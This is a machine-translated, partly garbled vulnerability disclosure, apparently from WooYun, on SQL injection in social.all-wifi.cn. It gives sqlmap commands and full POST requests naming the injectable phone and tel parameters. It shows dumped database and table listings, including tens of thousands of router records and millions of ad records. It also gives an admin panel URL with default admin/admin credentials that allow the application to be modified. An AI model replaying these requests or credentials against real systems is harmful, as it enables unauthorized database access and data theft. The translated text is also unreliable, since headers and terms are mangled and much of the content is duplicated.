漏洞标题 Wifi安全ALLWIFISQL包dba权限垮库查询（影响2w8千路/可修改应用信息） 相关制造商 All-wifi.cn 漏洞作者 黑色键盘丶 提交时间 2016-05-14 09: 38 公共时间 2016-06-28 19: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 注射技术 漏洞详细信息 Sqlmap语法：sqlmap.py -r 1.txt --dbs ---------------------------- tel参数----- post packet ------------ - ----- POST /index.php/Contacts/add HTTP/1.1 主持人: social.all-wifi.cn 代理连接:保持活动状态 内容长度: 85 接受: application/json，text/javascript，*/*; Q=0.01 来源:http://social.all-wifi.cn X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://social.all-wifi.cn/index.php/Contacts/contacts Accept-Encoding: gzip，deflate Accept-Language: zh-CN，zh; q=0.8 Cookie: PHPSESSID=0mu3236cmhmmcv3gtas3r790e5 电话=111＆安培;键入=％E8％AF％B7％E8％BE％93％E5％85％A5％E5％AF％B9％E6％96％B9％E6％89％8B％E6％9C％BA％E5 ％8F％B7 ------------------------------------------------ Sqlmap语法: sqlmap.py -r 2.txt --dbs ----------------------------------- post packet ----电话参数 POST /index.php/Login/login HTTP/1.1 主持人: social.all-wifi.cn 代理连接:保持活动状态 内容长度: 37 接受: application/json，text/javascript，*/*; Q=0.01 来源:http://social.all-wifi.cn X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://social.all-wifi.cn/index.php/Login/login Accept-Encoding: gzip，deflate Accept-Language: zh-CN，zh; q=0.8 Cookie: PHPSESSID=0mu3236cmhmmcv3gtas3r790e5 电话=13656785601＆安培;密码=qwe123 数据库信息***** MS:我的***** ***** atabas ***** ***** ALLW ***** ***** ALLW ***** ***** ***** IJI ***** ACTI ***** ***** _科尔***** ***** tion_s ***** *****荷兰国际集团***** ***** YSQ ***** ***** ance_s ***** ***** ORT ***** ***** xyal ***** *****张家口***** ***** HEJ ***** ***** OCI ***** *****美东时间***** *****如果我***** ***** llwi ***** ***** llwif ***** ***** oqing ***** ***** ***** X_Y ***** XDL ***** ***** XGW ***** ***** xzf ***** 当前库表信息 数据库:社交***** ---- + - ***** ***** | Ë***** ***** ---- + - ***** ***** | 2 ***** ***** | 5 ***** ***** | 3 ***** ***** n | 2 ***** ***** | 1 ***** ***** | 8 ***** ***** | 6 ***** ***** | 5 ***** ***** | 4 ***** ***** opy | 3 ***** ***** | 1 ***** ***** | 1 ***** ***** ---- + - ***** 垮查询查询 数据库: wifi这里的百万似乎是数百万的接入点 ***** ---- + --- ***** ***** |恩***** ***** ---- + --- ***** ***** | 24 ***** ***** | 48 ***** ***** | 28 ***** ***** | 27 ***** ***** | 34 ***** ***** | 34 ***** ***** | 10 ***** ***** | 10 ***** ***** | 29 ***** ***** | 70 ***** ***** | 70 ***** ***** | 54 ***** ***** | 32 ***** ***** | 24 ***** ***** | 13 ***** ***** | 12 ***** ***** | 11 ***** ***** _ ad | 7 ***** ***** e 4 ***** ***** | 3 ***** ***** r | 3 ***** ***** | 2 ***** ***** | 2 ***** ***** | 1 ***** ***** | 1 ***** ***** el | 1 ***** ***** ------ + ***** 2w8千路由信息转储看到了农业银行下的几条路线 http://xx.all-wifi.cn/admin/default.php admin admin输入 可以修改应用程序 漏洞证明： Sqlmap语法：sqlmap.py -r 1.txt --dbs ---------------------------- tel参数----- post packet ------------ - ----- POST /index.php/Contacts/add HTTP/1.1 主持人: social.all-wifi.cn 代理连接:保持活动状态 内容长度: 85 接受: application/json，text/javascript，*/*; Q=0.01 来源:http://social.all-wifi.cn X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://social.all-wifi.cn/index.php/Contacts/contacts Accept-Encoding: gzip，deflate Accept-Language: zh-CN，zh; q=0.8 Cookie: PHPSESSID=0mu3236cmhmmcv3gtas3r790e5 电话=111＆安培;键入=％E8％AF％B7％E8％BE％93％E5％85％A5％E5％AF％B9％E6％96％B9％E6％89％8B％E6％9C％BA％E5 ％8F％B7 ------------------------------------------------ Sqlmap语法: sqlmap.py -r 2.txt --dbs ----------------------------------- post packet ----电话参数 POST /index.php/Login/login HTTP/1.1 主持人: social.all-wifi.cn 代理连接:保持活动状态 内容长度: 37 接受: application/json，text/javascript，*/*; Q=0.01 来源:http://social.all-wifi.cn X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://social.all-wifi.cn/index.php/Login/login Accept-Encoding: gzip，deflate Accept-Language: zh-CN，zh; q=0.8 Cookie: PHPSESSID=0mu3236cmhmmcv3gtas3r790e5 电话=13656785601＆安培;密码=qwe123 数据库信息 后端DBMS: MySQL 5.0 可用数据库[23]: [*] actallwifi [*] appallwificn [*] dijiuqu [*] gy_activity [*] ik_ap_collect [*] information_schema [*] jingcai [*] mysql [*] performance_schema [*]门户网站 [*] proxyallwifi [*] qzjkd [*] shejiao [*]社交 [*]测试 [*] 无线上网 [*] wxallwificn [*] xx98allwificn [*] xx_yaoqinghan [*] xx_yjhx [*] xxdl [*] xxgw [*] xxzfproxy 当前库表信息 数据库:社交 + ---------------- + --------- + |表|参赛作品| + ---------------- + --------- + | tp_apinfo | 24101 | |要求| 55 | |消息| 30 | |验证| 23 | | userinfo | 11 | |小组成员| 8 | | `group` | 6 | |朋友们| 5 | |朋友| 4 | | ns_online_copy | 3 | | `user` | 1 | |管理员| 1 | + ---------------- + --------- + 垮查询查询 数据库: wifi这里的百万似乎是数百万的接入点 + ------------------ + --------- + |表|参赛作品| + ------------------ + --------- + | wifi_adrecode | 24421932 | | wifi_adcount | 4858467 | | apinfo | 28382 | | wifi_routemap | 27577 | | shopinfo | 3440 | | wifi_shop | 3440 | | wifi_member | 1002 | | ns_user | 1000 | | wifi_authlist | 294 | | wifi_access | 70 | | wifi_treenode | 70 | | wifi_ad | 54 | | wifi_day | 32 | | wifi_hours | 24 | | wifi_waptpl | 13 | | wifi_month | 12 | | wifi_trade | 11 | | wifi_routemap_ad | 7 | | wifi_advertise | 4 | | wifi_admin | 3 | | wifi_role_user | 3 | | wifi_authtpl | 2 | | wifi_role | 2 | | wifi_advertisers | 1 | | wifi_agent | 1 | | wifi_agentlevel | 1 | + ------------------ + --------- + 2w8千路由信息转储看到了农业银行下的几条路线 http://xx.all-wifi.cn/admin/default.php admin admin输入 可以修改应用程序 修理计划： 过滤 版权声明：请注明出处。黑键盘丶@乌云